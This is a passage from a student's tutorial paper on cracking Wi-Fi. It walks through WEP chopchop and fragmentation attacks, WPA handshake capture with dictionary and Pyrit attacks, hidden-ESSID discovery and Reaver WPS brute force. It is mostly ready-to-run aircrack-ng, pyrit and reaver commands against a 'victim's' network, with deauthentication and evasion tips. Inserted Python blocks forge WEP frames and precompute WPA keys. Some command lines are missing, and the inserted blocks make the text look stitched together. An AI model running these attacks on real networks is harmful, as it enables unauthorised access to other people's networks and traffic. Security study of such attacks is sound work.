was abcdef1234, and aircrack-ng's output shows KEY FOUND! [AB:CD:EF:12:34].
This was an example of how to break a WEP network with an already authenticated
client. When there are no clients connected to the network you want to break, you need a
different type of attack; let's find out how to do it.
So after you perform a fake authentication you need to wait until you get a packet to
attack. I kept one console window performing a fake authentication every second, as
you can see, so that I don't get deauthenticated for any reason, and another one running
the chopchop attack waiting for a packet to start on.
When the console asks Use this packet? press y and then ENTER to start the
chopchop attack.
Wait a few seconds for the chopchop attack to do its work. The file
replay_dec-0917-223734.xor shown above holds the recovered keystream and can now be used
in the next step to generate an ARP packet.
The objective is to have the access point rebroadcast the injected ARP packet. Each time
it rebroadcasts it, a new IV is obtained, and all these new IVs will ultimately be used to
crack the WEP key.
Use the following command (-a is the BSSID, -h your card's MAC address, -k and -l the
destination and source IP addresses, -y the keystream file from the previous step and -w
the output file):
#packetforge-ng -0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0917-223734.xor -w arp-request
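What packetforge-ng is doing with that .xor file, as an added example that is not part of the original tutorial or of the aircrack-ng suite: WEP encrypts each frame with RC4 keyed by IV || key, so whoever knows the keystream for one IV can encrypt any payload of the same length or shorter under that IV without knowing the key. The scenario is constructed with the tutorial's addresses and the key abcdef1234 recovered later in the text; the "AP" side uses the key, the attacker side never sees it. The .xor file format itself is not reproduced, the keystream is just handled as raw bytes.

```python
import struct
import zlib


def rc4(key, n):
    """RC4 keystream of n bytes for the given key (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, plaintext):
    """What the AP or client does: per-packet RC4 key = IV || secret key,
    body = IV (3) || key index (1) || RC4(plaintext || ICV)."""
    keystream = rc4(iv + key, len(plaintext) + 4)
    return iv + b"\x00" + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(key, body):
    """Decrypt and verify the ICV; returns (plaintext, icv_ok)."""
    iv, data = body[:3], body[4:]
    pt = xor(data, rc4(iv + key, len(data)))
    plaintext, tag = pt[:-4], pt[-4:]
    return plaintext, icv(plaintext) == tag


def recover_keystream(body, known_plaintext):
    """Attacker side, no key: ciphertext XOR (known plaintext || its ICV) is the RC4
    keystream for this IV. chopchop and the fragmentation attack recover the same bytes
    without knowing the plaintext up front; aircrack-ng stores them as a .xor file."""
    return body[:3], xor(body[4:], known_plaintext + icv(known_plaintext))


def forge(iv, keystream, plaintext):
    """packetforge-ng -y: encrypt any payload that fits under the recovered keystream,
    reusing the same IV. The AP decrypts it with the real key and the ICV checks out."""
    pt = plaintext + icv(plaintext)
    if len(pt) > len(keystream):
        raise ValueError("keystream too short for this payload")
    return iv + b"\x00" + xor(pt, keystream)


LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"   # fixed prefix of every WEP-encrypted ARP packet


def ip(s):
    return bytes(int(x) for x in s.split("."))


def arp_request(sender_mac, sender_ip, target_ip):
    # hw type 1, proto 0x0800, hlen 6, plen 4, opcode 1 (request), zero target MAC
    return b"\x00\x01\x08\x00\x06\x04\x00\x01" + sender_mac + ip(sender_ip) + b"\x00" * 6 + ip(target_ip)


def demo():
    """Constructed scenario: the client 74:EA:3A:90:C7:21 and the key abcdef1234 are the
    tutorial's; the IV and the IP addresses are chosen for the example."""
    key = bytes.fromhex("abcdef1234")
    client = bytes.fromhex("74ea3a90c721")
    iv = b"\x5d\x11\x02"
    # 1. A client sends an ordinary ARP request; this is what airodump-ng captures.
    captured_pt = LLC_SNAP_ARP + arp_request(client, "192.168.2.105", "192.168.2.1")
    captured = wep_encrypt(key, iv, captured_pt)
    # 2. The attacker guesses the plaintext (LLC/SNAP + ARP layout is fixed) and
    #    recovers 40 bytes of keystream for this IV.
    iv2, keystream = recover_keystream(captured, captured_pt)
    # 3. packetforge-ng -k 255.255.255.255 -l 255.255.255.255: a broadcast ARP request
    #    of the same length, encrypted with the recovered keystream.
    forged_pt = LLC_SNAP_ARP + arp_request(client, "255.255.255.255", "255.255.255.255")
    forged = forge(iv2, keystream, forged_pt)
    # 4. The AP decrypts with the real key and accepts the frame.
    plaintext, ok = wep_decrypt(key, forged)
    return {"keystream_len": len(keystream), "forged_icv_ok": ok,
            "ap_sees_forged_payload": plaintext == forged_pt}
```

Because the ICV is a plain CRC-32 under a stream cipher, it gives no protection against this: the forged frame passes the integrity check, the AP relays it, and every relayed copy carries a fresh IV for aircrack-ng to feed on.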
So as you can see it found the WEP key of the network. The key I used for this example
was 1234567890, and aircrack-ng's output shows KEY FOUND! [12:34:56:78:90].
With this we sniff all the packets from the WLAN network and save them in files
called wepska. We will need to deauthenticate an authenticated client in order to
capture the 140 byte shared key keystream when it authenticates again.
After the deauthentication, look at the top line of the airodump-ng window: it now says
140 bytes keystream: 00:80:5A:28:B5:AB
This means airodump-ng has captured the shared key authentication exchange and written
the .xor keystream file we need for a fake authentication.
Use the following command (-h is the MAC address of your own card and the interface is
the monitor interface created by airmon-ng):
#aireplay-ng -1 0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -y wepska-01-00:80:5A:28:B5:AB.xor mon0
Remember to always change the file name from the one I have to the one you get; they
will differ.
Wait until you get a packet to use in the attack. When the program asks Use this
packet? press y and then ENTER to use it, and you will get a fragment of keystream that
we will use to create an ARP request.
Basically this is the same as we did before for WEP Open System without connected
clients.
As you can see in the output of the fragmentation attack, you now have a file called
fragment-0921-140138.xor or something similar.
Let's now create an ARP request. Use the following command:
This command creates an ARP request from that fragment. Now we need to inject that
packet into the airwaves; the AP will rebroadcast it, producing new IVs:
#aireplay-ng -2 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -r arp-request mon0
Keep the airodump-ng window sniffing and saving; as set up above, those packets are
being written to wepska*.cap. When we have enough IVs, around 50,000, we run the
attack on the WEP key with the following command:
#aircrack-ng -b 00:80:5A:28:B5:AB wepska*.cap
As you can see, the key was successfully cracked. The key for this example was
1234567890 and, as you can see in the image, KEY FOUND: [12:34:56:78:90]. So this
is everything about WEP. Let's see now the WPA part of this tutorial.
The number after --deauth is the number of deauthentication packets aireplay-ng will send.
A higher number will increase the probability of it working, but is less stealthy.
The deauthentication was done and now we have got the four-way handshake.
Once the handshake has been captured, the attacker can stop capturing all packets. The
information contained in the handshake is all that is needed to crack the WPA
passphrase.
Once the attacker has the handshake it is possible to crack the passphrase with
dictionary techniques. This technique uses a wordlist and goes through each word one at
a time, encrypting it with the other data gathered (the SSID and others) to see if it
matches. When a match occurs, the word from the list is the passphrase used.
This can be extremely time consuming depending on the complexity of the
passphrase, the size of the dictionary file and the speed of your CPU. An attacker is
limited by his processor speed in how many passwords he can try per second.
With dictionary files containing millions and millions of different combinations of
letters, words and numbers, the process could take a very long time.
Fortunately, most consumers choose simple, easy to remember passphrases that can be
recovered using smaller dictionary files containing common names and passwords.
The program aircrack-ng can be used to crack the handshake. The attacker must have a
word list on his system. Backtrack includes several wordlists of different sizes, and
larger ones can be downloaded from the internet.
To use a word list with aircrack-ng and our captured handshake use this command:
#aircrack-ng -w /pentest/passwords/wordlists/wpa.txt wpakey*.cap
The output will look like this when aircrack-ng gets the password:
It took a little bit more than 20 minutes to discover the Wireless AP passphrase. The
attacker now has the ability to get inside the network. It took 954864 guesses to
discover the password. The dictionary file that I used could be considered a big
dictionary. You might not be able to avoid a successful attack by a determined attacker,
but you sure can make his work a lot harder if you use a strong password.
Then do this:
sudo apt-get install libssl-dev
sudo apt-get install scapy
sudo apt-get install python-dev
Browse to the pyrit directory:
cd /pyrit_svn/pyrit
And type:
sudo python setup.py build
sudo python setup.py install
Ok, now you have Pyrit installed and it should be up and running.
So at this point you should have all the information about the network you will try to
attack. For this example we will attack a WPA encrypted network with WLAN as the
ESSID, 00:80:5A:28:B5:AB as the BSSID and working on channel 11.
Now we should begin sniffing only this network by using the following command:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w wpahandshake wlan0
This will sniff the packets from WLAN and save them in a file called wpahandshake.
Once again I remind you that we will be looking for the *.cap file in the end.
If a client is connected to the network make a deauthentication attack so the client needs
to re-authenticate and you get the handshake or if no one is connected, wait for someone
to do it.
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan1
Now that you have the handshake, let's use pyrit.
Let's analyze our handshake file; use the following command in the command line:
#pyrit wpahandshake*.cap analyze
Note that wpahandshake*.cap is the name of the files that airodump-ng saves with the
packets sniffed from the victim's network; they could be wpahandshake-01.cap,
wpahandshake-02.cap, and so on.
You should get a window like this:
The output says that the Access Point has the MAC 00:80:5A:28:B5:AB with WLAN as
the ESSID.
It also says that the file captured a handshake from the client with MAC address
00:15:AF:A2:8D:98.
So now let's start working with Pyrit's database.
As you may know, guessing the password used in WPA-PSK and WPA2-PSK is a
computationally intensive task. During this process, 100% of your CPU is being used to
compute what is known as the Pairwise Master Key, a 256-bit key derived from the
ESSID and a password using the PBKDF2-HMAC-SHA1 algorithm. One of the major
weaknesses of WPA-PSK is that the Pairwise Master Key has no elements that are
unique to the moment of the key negotiation between Access Point and Station. It is
therefore possible to pre-compute the Pairwise Master Key and store it for later use.
This is where Pyrit's database kicks in. It can store ESSIDs, passwords and their
corresponding Pairwise Master Keys, possibly growing to the size of hundreds of
millions of entries. Starting with a fresh installation of Pyrit, your database will most
probably be empty.
Issue the following command to get an overview:
#pyrit eval
And you will get this output:
This code is distributed under the GNU General Public License v3+
Connecting to storage at 'file://'... connected.
Passwords available: 0
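The following Python is an added example, not code from the tutorial or from Pyrit, showing the derivation described above: the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt (4096 iterations, 256 bits), so it contains nothing from the handshake itself and can be precomputed per ESSID. The wordlist and the ESSID WLAN-home are constructed for the example; the "IEEE"/"password" pair is the standard's published test vector.

```python
import hashlib
import hmac

# IEEE 802.11i parameters for the PSK-to-PMK mapping.
PMK_ITERATIONS = 4096
PMK_BYTES = 32  # 256 bits


def derive_pmk(essid: str, passphrase: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=essid, 4096 iterations, 32 bytes).

    Note what is absent: no nonces, no MAC addresses, nothing from the
    four-way handshake. Same ESSID + same passphrase always gives the same PMK.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), PMK_ITERATIONS,
                               dklen=PMK_BYTES)


def build_pmk_table(essid: str, wordlist) -> dict:
    """What a 'pyrit batch' run does for one ESSID: pay the PBKDF2 cost once
    per candidate passphrase and keep the result keyed by that passphrase."""
    return {word: derive_pmk(essid, word) for word in wordlist}


def table_reusable_for(table: dict, essid: str) -> bool:
    """True only if the stored PMKs are still valid for this ESSID.

    Because the ESSID is the PBKDF2 salt, a table built for 'WLAN' is useless
    against an AP named anything else: the defender's cheapest countermeasure
    against precomputed tables is a unique ESSID (plus a long passphrase).
    """
    return all(hmac.compare_digest(pmk, derive_pmk(essid, word))
               for word, pmk in table.items())


if __name__ == "__main__":
    # Constructed wordlist, not a real dictionary.
    words = ["password", "security", "12345678"]
    table = build_pmk_table("WLAN", words)
    for word, pmk in table.items():
        print(f"WLAN / {word!r:12} -> PMK {pmk.hex()}")
    print("table valid for WLAN:     ", table_reusable_for(table, "WLAN"))
    print("table valid for WLAN-home:", table_reusable_for(table, "WLAN-home"))
```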
Now that we have some passwords in the database, we have to create an ESSID. For
that, use the following command:
#pyrit -e WLAN create_essid
Note that WLAN is our victim's ESSID.
Pyrit's output will say that the ESSID WLAN was created successfully, and if you use the
eval command again it will show you that the ESSID WLAN doesn't have any passwords
pre-computed yet.
So we already have some passwords in the database and we have an ESSID created; we
now need to pre-compute the passwords to use with that ESSID. This process could take
some minutes. It depends on how many passwords you have imported into the database.
To pre-compute the passwords with the ESSID you just created, use this command:
#pyrit batch
Pyrit will give the output "Batchprocessing done" when it completes the process.
We can now use the Pairwise Master Keys stored in the database to attack the same
handshake as in the example above. Instead of running a passthrough attack, where
the database is not touched at all, we issue a database attack like the following:
This process is much faster than a dictionary attack; as you can see in the image above,
Pyrit was trying 515375 passwords per second and told us in the output that the
password is security. This process only takes more time pre-computing the passwords
with the ESSID, but that will be useful when you have to use many dictionaries at the same
time.
As you can see, there is a network with a strange ESSID; it is something like <length: 1>.
This is a hidden ESSID, and we'll be able to get the real ESSID by performing a
deauthentication on one of the connected clients.
Let's sniff only the hidden network's packets:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w hiddenwpa wlan0
Let's deauthenticate a client now:
#aireplay-ng -0 10 -a 00:80:5A:28:B5:AB -c 00:15:AF:A2:8D:98 wlan0
So, now that you have deauthenticated a client, you should have something like this:
As you can see, the network ESSID has now changed to WLAN. By doing this we also got a
handshake, so let's now crack the password:
#pyrit -e WLAN -r hiddenwpa-01.cap attack_db
This time we needed to add the -e parameter, since it's a hidden ESSID and pyrit can't
guess it. And we have the password: it is security.
Doing the math, there would be 10^8 (100 000 000) PIN combinations.
However, an attacker can derive information about the correctness of parts of the PIN from
the AP's responses.
1. If the attacker receives an EAP-NACK message after sending M4, he knows that
the 1st half of the PIN was incorrect.
2. If the attacker receives an EAP-NACK message after sending M6, he knows that
the 2nd half of the PIN was incorrect.
This form of authentication dramatically decreases the maximum possible
authentication attempts needed from 10^8 = 100 000 000 to 10^4 + 10^4 = 20 000.
As the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at
most 10^4 + 10^3 = 11 000 attempts needed to find the correct PIN.
Reaver has been designed to be a robust and practical attack against WPS, and has been
tested against a wide variety of access points and WPS implementations.
Below there is a flowchart that explains the method used by the bruteforce attack on the
WPS flaw:
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess
the correct WPS pin and recover the passphrase.
I want to make it clear that this will only work on networks with WPS enabled. Since the
router I've been using doesn't have WPS, I will use a new one with the same
configuration (ESSID and passphrase).
But you don't need to worry, I'll cover how to check if an AP has WPS enabled or not.
First of all, if you need to, download Reaver. It doesn't come with older Backtrack
versions, so you might have to install it, even though it is easy to do.
You can download Reaver at http://code.google.com/p/reaver-wps/downloads/list
After you download it, extract the Reaver folder to your desktop or whatever other folder you
want.
By the way, Reaver is only supported on the Linux platform and requires the libpcap and
libsqlite3 libraries.
After you have extracted the folder, browse to it. Let's do it as if I had extracted it to my Desktop
folder.
In the shell, browse to the following directory:
#cd /root/Desktop/reaver-1.3/src/
Within this directory you will find several files.
Let's start the installation; run the following command:
# ./configure
If you get this error: bash: ./configure: Permission denied
Use the command:
#chmod +x configure
This will give execution permission to the file configure.
Try again; this time you won't have any problems.
# ./configure
Let it run; when it finishes, use the following command:
# make
And then:
# make install
Ok, Reaver is installed.
Now we can have some fun with Reaver. Let's start the attack.
Then run:
#airodump-ng mon0
You can use aircrack-ng's fake authentication while running reaver; it's up to you.
If you start getting blocked by the AP, use the macchanger command to change your MAC
and start again.
After some hours running Reaver, you will get to the passphrase.
As you can see, we got the passphrase, which in this case was security.
Conclusions
I hope you all enjoyed this paper as much as I enjoyed writing it. Hopefully, by now
you understand better how insecure most of the Wireless Networks are in our days and
you'll be careful next time you configure a Wireless AP.
When I started this Independent Study I had a rough idea of what I wanted to
research/learn about and it was a very rewarding experience. I've learned more than I
was expecting and I really enjoyed the time I took learning and practicing.
I read books and websites, watched videos from which I guided myself, but still, I thought
about writing my own paper as a second method of study.
I took the leap after I found a paper like this one and I really wanted, as retribution, to
write a paper of my own, so others who are in the same situation that I was in some months ago
could learn with a simple and pleasant reading, since I wrote this paper as I was learning
from zero.